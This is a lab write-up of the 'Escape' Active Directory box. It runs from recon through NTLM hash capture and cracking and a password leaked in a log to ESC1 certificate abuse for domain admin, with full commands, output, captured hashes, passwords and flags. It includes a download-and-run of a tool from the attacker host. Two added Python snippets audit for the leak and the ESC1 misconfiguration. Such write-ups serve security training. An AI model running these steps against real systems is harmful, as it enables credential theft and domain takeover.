Escape

Recon

nmap_scan.log
Open 10.129.228.253:53
Open 10.129.228.253:88
Open 10.129.228.253:135
Open 10.129.228.253:139
Open 10.129.228.253:389
Open 10.129.228.253:445
Open 10.129.228.253:464
Open 10.129.228.253:593
Open 10.129.228.253:636
Open 10.129.228.253:1433
Open 10.129.228.253:3269
Open 10.129.228.253:3268
Open 10.129.228.253:5985
Open 10.129.228.253:9389
Open 10.129.228.253:49667
Open 10.129.228.253:49689
Open 10.129.228.253:49690
Open 10.129.228.253:49715
Open 10.129.228.253:49725
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.253

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-11-27 03:21:49Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
1433/tcp  open  ms-sql-s      syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-11-27T03:23:20+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-27T03:20:57
| Not valid after:  2054-11-27T03:20:57
| MD5:   d620:b64f:550c:32fc:adfb:c990:3e91:87fb
| SHA-1: c6c8:253c:4863:6ab0:fd7c:f8c9:71a1:53cd:a8bd:598f
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-27T03:23:19+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after:  2074-01-05T23:03:57
| MD5:   ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack Microsoft Windows RPC
49715/tcp open  msrpc         syn-ack Microsoft Windows RPC
49725/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-11-27T03:22:40
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 29662/tcp): CLEAN (Timeout)
|   Check 2 (port 8810/tcp): CLEAN (Timeout)
|   Check 3 (port 12096/udp): CLEAN (Timeout)
|   Check 4 (port 41824/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s

SMB (139, 445)

└─$ netexec smb 10.129.228.253 -u 'guest' -p '' --shares
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [+] sequel.htb\guest:
SMB         10.129.228.253  445    DC               [*] Enumerated shares
SMB         10.129.228.253  445    DC               Share           Permissions     Remark
SMB         10.129.228.253  445    DC               -----           -----------     ------
SMB         10.129.228.253  445    DC               ADMIN$                          Remote Admin
SMB         10.129.228.253  445    DC               C$                              Default share
SMB         10.129.228.253  445    DC               IPC$            READ            Remote IPC
SMB         10.129.228.253  445    DC               NETLOGON                        Logon server share
SMB         10.129.228.253  445    DC               Public          READ
SMB         10.129.228.253  445    DC               SYSVOL                          Logon server share
└─$ smbclient -U guest% //10.129.228.253/Public
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1441003 blocks available
smb: \> get 'SQL Server Procedures.pdf'
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \'SQL
smb: \> prompt
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (109.2 KiloBytes/sec) (average 109.2 KiloBytes/sec)
smb: \> exit

Creds: PublicUser:GuestUserCantWrite1

MSSQL (1433)

└─$ netexec smb 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1' --shares
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.253  445    DC               [+] sequel.htb\PublicUser:GuestUserCantWrite1
SMB         10.129.228.253  445    DC               [-] Error enumerating shares: STATUS_ACCESS_DENIED

└─$ netexec winrm 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [-] sequel.htb\PublicUser:GuestUserCantWrite1

└─$ netexec ldap 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1'
SMB         10.129.228.253  445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAPS       10.129.228.253  636    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAPS       10.129.228.253  636    DC               [+] sequel.htb\PublicUser:GuestUserCantWrite1

└─$ netexec mssql 10.129.228.253 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
MSSQL       10.129.228.253  1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.129.228.253  1433   DC               [+] DC\PublicUser:GuestUserCantWrite1
└─$ impacket-mssqlclient 'SEQUAL.HTB'/'PublicUser':'GuestUserCantWrite1'@'10.129.228.253'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands

SQL (PublicUser  guest@master)> enable_xp_cmdshell
ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (PublicUser  guest@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0
tempdb                   0
model                    0
msdb                     1

Looks like we can't just get RCE right off the bat. The database is also empty, so there is not much to find there.

Since the target is Windows, we can try to capture the SQL service account's NetNTLMv2 hash and crack it.

sql_svc

└─$ sudo responder -I tun0
---
SQL (PublicUser  guest@master)> xp_dirtree \\10.10.14.99\letmein
---
[SMB] NTLMv2-SSP Client   : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:78cce724b5e42a34:9815268188A21958658DEE45868556F8:010100000000000080DFEFE01140DB01E1AA31D36CCBA84400000000020008005A0048005A00380001001E00570049004E002D004500520056005200550054004C0055004F005200560004003400570049004E002D004500520056005200550054004C0055004F00520056002E005A0048005A0038002E004C004F00430041004C00030014005A0048005A0038002E004C004F00430041004C00050014005A0048005A0038002E004C004F00430041004C000700080080DFEFE01140DB010600040002000000080030003000000000000000000000000030000072613B41AF92C4F4F914BE46B70E4C4187237DEA8975C71245EE02C8EC53FA200A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00390039000000000000000000
➜ .\hashcat.exe --show .\hashes
5600 | NetNTLMv2 | Network Protocol
➜ .\hashcat.exe -m 5600 -a 0 .\hashes .\rockyou.txt
sql_svc::sequel:78cce724b5e42a...:REGGIE1234ronnie
└─$ netexec mssql 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
MSSQL       10.129.228.253  1433   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL       10.129.228.253  1433   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie

└─$ netexec winrm 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)

Privilege Escalation (Ryan.Cooper)

└─$ evil-winrm -i 10.129.228.253 -u 'sql_svc' -p 'REGGIE1234ronnie'
*Evil-WinRM* PS C:\SQLServer\Logs> cat ERRORLOG.BAK | sls pass

2022-11-18 13:43:06.75 spid18s     Password policy update was successful.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
---
└─$ netexec winrm 10.129.228.253 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
WINRM       10.129.228.253  5985   DC               [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM       10.129.228.253  5985   DC               [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)

Creds: Ryan.Cooper:NuclearMosquito3
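
The ERRORLOG.BAK lines above show a password typed into the username field right after a failed logon for a real account. The following is an added example (not part of the original writeup) of a defender-side check for that pattern; the sample log, the CORP accounts and the KNOWN_LOGINS inventory are constructed assumptions, and the flagged value is masked in the report.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the ERRORLOG line format shown above (not real data).
SAMPLE_LOG = """\
2022-11-18 13:43:05.96 Logon       Logon failed for user 'CORP\\alice'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:06.02 Logon       Logon failed for user 'Example-Passw0rd!'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:11.10 Logon       Logon failed for user 'CORP\\bob'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2022-11-18 14:20:00.00 Logon       Logon failed for user 'svc_report'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""
KNOWN_LOGINS = {"CORP\\alice", "CORP\\bob", "sa"}  # assumed inventory of valid logins

FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_failed_logons(text):
    """Return (timestamp, user, client) for every failed-logon line."""
    events = []
    for line in text.splitlines():
        m = FAILED.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events

def find_leaked_passwords(text, known_logins, window=timedelta(seconds=10)):
    """Flag an unknown 'username' that follows a failed logon for a known
    account from the same client within `window`: it is probably that
    account's password, now stored in clear text in the log."""
    known = {k.lower() for k in known_logins}
    last_known = {}   # client -> (timestamp, account) of last known-account failure
    findings = []
    for ts, user, client in parse_failed_logons(text):
        if user.lower() in known:
            last_known[client] = (ts, user)
            continue
        prev = last_known.get(client)
        if prev and ts - prev[0] <= window:
            findings.append({
                "account_to_rotate": prev[1],
                "client": client,
                "logged_at": ts.isoformat(sep=" ", timespec="milliseconds"),
                # never copy the suspected secret into the report
                "masked_value": user[:1] + "*" * (len(user) - 1),
            })
    return findings

if __name__ == "__main__":
    for finding in find_leaked_passwords(SAMPLE_LOG, KNOWN_LOGINS):
        print(finding)
```

Any account reported here needs a password rotation, and the log files and their backups should not be readable by service accounts that do not need them.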

User.txt

└─$ evil-winrm -i 10.129.228.253 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
*Evil-WinRM* PS C:\Users\Ryan.Cooper> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\Ryan.Cooper\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/26/2024   7:21 PM             34 user.txt

da4b64e3349dabce0dbc747c2a799cc9

Privilege Escalation

Nothing much from winpeas.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Music> curl 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Music> .\wp.exe | tee -filepath wp.log
...
╔══════════╣ AV Information
  [X] Exception: Invalid namespace
    No AV was detected!!
    Not Found
...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy:
    FilterAdministratorToken:
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.
...

Enumerate AD

└─$ bloodhound-python -c all -u Ryan.Cooper -p NuclearMosquito3 -d sequel.htb -ns 10.129.228.253 --zip -op ryan

No outbound permissions, but we are a member of the Certificate Service group.

ESC1

└─$ certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -target sequel.htb -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[*] Got CA configuration for 'sequel-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc1-template-allows-san
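
The ESC1 verdict above rests on several template settings holding at the same time. The following is an added example (not part of the original writeup or of Certipy) of an audit helper that parses a template block in the text layout shown above and evaluates those conditions; the ExampleUserAuth template, the CORP domain and the low-privilege group list are constructed assumptions.

```python
# Constructed template block in the "Key : Value" layout of the enumeration output.
SAMPLE_TEMPLATE = """\
    Template Name                   : ExampleUserAuth
    Enabled                         : True
    Client Authentication           : True
    Any Purpose                     : False
    Enrollee Supplies Subject       : True
    Extended Key Usage              : Client Authentication
                                      Secure Email
    Requires Manager Approval       : False
    Authorized Signatures Required  : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights           : CORP\\Domain Admins
                                      CORP\\Domain Users
"""

# Assumed list of groups treated as low-privileged for this audit.
LOW_PRIV = ("domain users", "authenticated users", "domain computers", "everyone")

def parse_template(text):
    """Parse 'Key : Value' lines; a bare line indented past the end of the
    previous key continues that key's value list."""
    fields, key, key_end = {}, None, 0
    for raw in text.splitlines():
        indent = len(raw) - len(raw.lstrip())
        if " : " in raw:
            k, v = raw.split(" : ", 1)
            key = k.strip()
            key_end = indent + len(key)
            fields[key] = [v.strip()]
        elif raw.strip() and key and indent > key_end:
            fields[key].append(raw.strip())
        else:
            key = None  # section header or blank line ends the current value
    return fields

def esc1_conditions(t):
    """Return {condition: holds?} for each setting ESC1 depends on."""
    def flag(name):
        return t.get(name, ["False"])[0] == "True"
    broad = [p for p in t.get("Enrollment Rights", [])
             if p.split("\\")[-1].lower() in LOW_PRIV]
    return {
        "template enabled": flag("Enabled"),
        "enrollee supplies subject": flag("Enrollee Supplies Subject"),
        "client authentication allowed": flag("Client Authentication") or flag("Any Purpose"),
        "no manager approval": not flag("Requires Manager Approval"),
        "no authorized signature needed": t.get("Authorized Signatures Required", ["0"])[0] == "0",
        "low-privileged group can enroll": bool(broad),
    }

def is_esc1(t):
    """ESC1 applies only when every condition holds at once."""
    return all(esc1_conditions(t).values())

if __name__ == "__main__":
    template = parse_template(SAMPLE_TEMPLATE)
    print(is_esc1(template), esc1_conditions(template))
    # Breaking any single condition removes the finding, e.g. building the subject from AD:
    hardened = dict(template, **{"Enrollee Supplies Subject": ["False"]})
    print(is_esc1(hardened))
```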

└─$ certipy-ad req -u "Ryan.Cooper@sequel.htb" -p "NuclearMosquito3" -dc-ip "10.129.228.253" -target "sequel.htb" -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'Administrator@sequel.htb' -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'sequel.htb' at '10.129.228.253'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.228.253[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.228.253[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.228.253
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

└─$ sudo ntpdate 10.129.228.253
2024-11-26 23:27:35.479593 (-0500) +28799.048561 +/- 0.037762 10.129.228.253 s1 no-leap
CLOCK: time stepped by 28799.048561

└─$ echo $(( 28799.048561 / 3600 ))
7.9997357113888885

└─$ faketime -f +8h certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.228.253
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> ls -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       11/26/2024   7:21 PM             34 root.txt

0c8da0934f430de59e418a98520e58f5
